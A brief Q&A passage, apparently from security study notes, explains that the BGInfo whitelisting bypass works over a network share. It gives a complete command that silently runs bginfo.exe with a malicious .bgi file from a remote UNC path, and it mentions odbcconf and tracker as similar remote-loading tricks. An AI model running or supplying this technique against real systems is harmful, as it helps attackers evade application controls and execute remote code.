Can the BGInfo whitelist bypass be executed from a network share?

Yes. Both `bginfo.exe` and the malicious `.bgi` file can be hosted on a remote server and executed via UNC path. The command `\\WIN-FVJLPTISCFE\test\bginfo.exe \\WIN-FVJLPTISCFE\test\test1.bgi /timer:0 /nolicprompt /silent` will bypass local whitelisting rules if the network share is trusted. This is similar to other LOLBin techniques like using `odbcconf` or `tracker` to load DLLs from remote sources, as seen in Study Notes Weekly No.3.